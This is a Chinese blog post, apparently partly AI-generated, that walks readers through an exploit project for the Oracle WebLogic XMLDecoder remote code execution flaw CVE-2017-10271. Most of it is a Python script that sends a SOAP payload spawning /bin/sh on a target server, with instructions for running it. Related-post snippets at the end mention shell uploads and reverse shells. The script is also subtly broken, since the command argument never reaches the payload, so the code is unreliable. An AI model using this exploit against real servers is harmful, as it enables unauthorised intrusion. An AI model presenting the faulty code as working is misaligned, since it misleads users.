CVE-2017-10271 项目使用教程

最新推荐文章于 2025-03-13 11:17:56 发布
最新推荐文章于 2025-03-13 11:17:56 发布
阅读量421 收藏 9
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00518/article/details/141745098
版权

CVE-2017-10271 项目使用教程

CVE-2017-10271Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)项目地址:https://gitcode.com/gh_mirrors/cve/CVE-2017-10271

1. 项目的目录结构及介绍

CVE-2017-10271/
├── README.md
├── exploit.py
└── requirements.txt
  • README.md: 项目说明文件,包含项目的基本信息和使用方法。
  • exploit.py: 项目的主要执行文件,用于执行漏洞利用。
  • requirements.txt: 项目依赖文件,列出了运行该项目所需的Python包。

2. 项目的启动文件介绍

exploit.py

exploit.py 是项目的主要执行文件,用于执行针对 CVE-2017-10271 漏洞的利用。以下是该文件的主要功能和使用方法:

import requests
import sys

def exploit(url, cmd):
    payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java version="1.8" class="java.beans.XMLDecoder">
            <void class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="2">
                <void index="0">
                  <string>/bin/sh</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
              </array>
              <void method="start"/>
            </void>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>"""

    headers = {
        'Content-Type': 'text/xml',
    }

    response = requests.post(url, data=payload, headers=headers)
    print(response.text)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print("Usage: python exploit.py <target_url> <command>")
        sys.exit(1)

    url = sys.argv[1]
    cmd = sys.argv[2]
    exploit(url, cmd)

使用方法

  1. 安装所需的依赖包:

    pip install -r requirements.txt

  2. 运行漏洞利用脚本:

    python exploit.py <target_url> <command>

    例如:

    python exploit.py http://example.com/wls-wsat/CoordinatorPortType "ls -la"

3. 项目的配置文件介绍

requirements.txt

requirements.txt 文件列出了运行该项目所需的Python包,内容如下:

requests
  • requests: 用于发送HTTP请求的Python库。

通过安装这些依赖包,可以确保 exploit.py 脚本能够正常运行。

pip install -r requirements.txt

以上是 CVE-2017-10271 项目的使用教程,包含了项目的目录结构、启动文件和配置文件的详细介绍。希望这些信息能帮助你更好地理解和使用该项目。

CVE-2017-10271Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)项目地址:https://gitcode.com/gh_mirrors/cve/CVE-2017-10271

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

Spring RCE 漏洞 CVE-2022-22965 的终极解决方案
oscar999的专栏
04-01 1万+
Spring框架爆出的RCE(远程命令执行)漏洞,现在这个漏洞有了统一的编号: **CVE-2022-22965**。 这个漏洞的主要原因是在JDK 9+版本里,Spring MVC 的数据绑定时出现的漏洞。
Spring连环CVE-2015-5211和CVE-2020-5421漏洞升级教程
xmt1139057136的专栏
08-14 2372
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草推荐:https://www.xttblog.com/?p=5259我们不...
Weblogic、CVE-2017-10271
01-03
weblogic打补丁操作步骤 主义更换路径!攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发现此漏洞的利用方式为传播虚拟币挖矿程序,不排除会被黑客用于其他目的的攻击。
CVE-2017-10271
Dikesi的博客
02-10 1897
Weblogic WLS组件远程代码执行漏洞
Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)
又菜又爱倒腾的博客
10-29 1174
#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)# 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 三、产生原因 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执
利用Vulnhub复现漏洞 - GIT-SHELL 沙盒绕过(CVE-2017-8386)
JiangBuLiu的博客
07-08 1074
GIT-SHELL 沙盒绕过(CVE-2017-8386)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现原理基于ssh协议的git拉取流程如何禁止git用户执行系统shellgit-shell 沙盒绕过漏洞(CVE-2017-8386)通过ssh进行利用一些限制 Vulnhub官方复现教程 https://vulhub.org/#/environments/git/CVE-2017-8...
Fastjson 反序列化漏洞(CVE-2017-18349)
qq_68163788的博客
06-19 1133
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
CVE-2017-3599漏洞复现(1),网络安全面试你必须要知道的那些知识
m0_60666841的博客
04-05 661
s.close()
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
CVE-2017-10271(JAVA XMLDecoder反序列化专用工具).zip
06-22
测试专用
CVE-2017-3599poc
07-27
CVE-2017-3599,Unspecified vulnerability in the Oracle Document Capture component in Oracle Fusion Middleware 10.1.3.4 and 10.1.3.5 allows remote attackers to affect integrity and availability via unknown vectors related to Import Server. NOTE: the previous information was obtained from the January 2011 CPU. Oracle has not commented on claims from the original researcher that remote attackers can overwrite arbitrary files and execute arbitrary code via a full pathname in the first argument to the WriteJPG method in the NCSECWLib ActiveX control.
uWSGI 漏洞(CVE-2018-7490)
qq_40624810的博客
11-09 569
… 表示上一级目录 %2f是url编码的/ uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 访问地址存在使用信息,存在uwsgi/php,但是没找到显示版本的地址,就盲试、 可以多加几个%2f确保是根目录 ...
weblogic-CVE_2017_10271
最新发布
m0_62146983的博客
03-13 475
打开网页发现是weblogic的报错页面。
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
deginner2的博客
07-29 5265
CVE-2017-10271(WebLogic XMLDecoder反序列化漏洞)
weblogic 反序列化(CVE-2017-10271
YouthBelief的博客
11-01 1383
weblogic 反序列化(CVE-2017-10271) 0x01 漏洞描述 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 7001端口 0x02 环境搭建 vulfocus靶场 目录wls-wsat/CoordinatorPortType 如果访问/wls-wsat/CoordinatorPort
weblogic CVE 2017-10271
ChenD的学习笔记
05-22 2350
将输出重定向到当前循环的Branding_Login_WeblogicConsole.gif文件的同级目录下的pwd.txt文件,因为可以访问到该图片,所以能访问到创建的文件。这里随便找一个可访问的文件,访问192.168.27.128:7001/console,进入到登陆页面,右键查看源代码,随便找一个图片或文件的链接,这就搞到了可访问的文件名。这条命令的意思是,找到所有叫Branding_Login_WeblogicConsole.gif的文件,循环读取,每次循环 执行 id;ifconfig命令,
WebLogic:CVE-2017-10271[XML反序列化]
h1008685的博客
08-01 863
WebLogic:CVE-2017-10271[XML反序列化],漏洞成因,环境部署,漏洞利用:1.漏洞发生页 2.配置poc请求包,3.kali监听端口,4.bp发送poc请求包,5.连接建立成功
绕过Oracle WebLogic CVE-2018-2628补丁的详细教程
资源摘要信息:"ysoserial-cve-2018-2628是一个安全研究项目,该项目揭露了Oracle WebLogic服务器中一个特定的远程代码执行漏洞,即CVE-2018-2628。这个漏洞主要存在于WebLogic Server的特定版本中,允许攻击者在没有...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戚巧琚Ellen

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值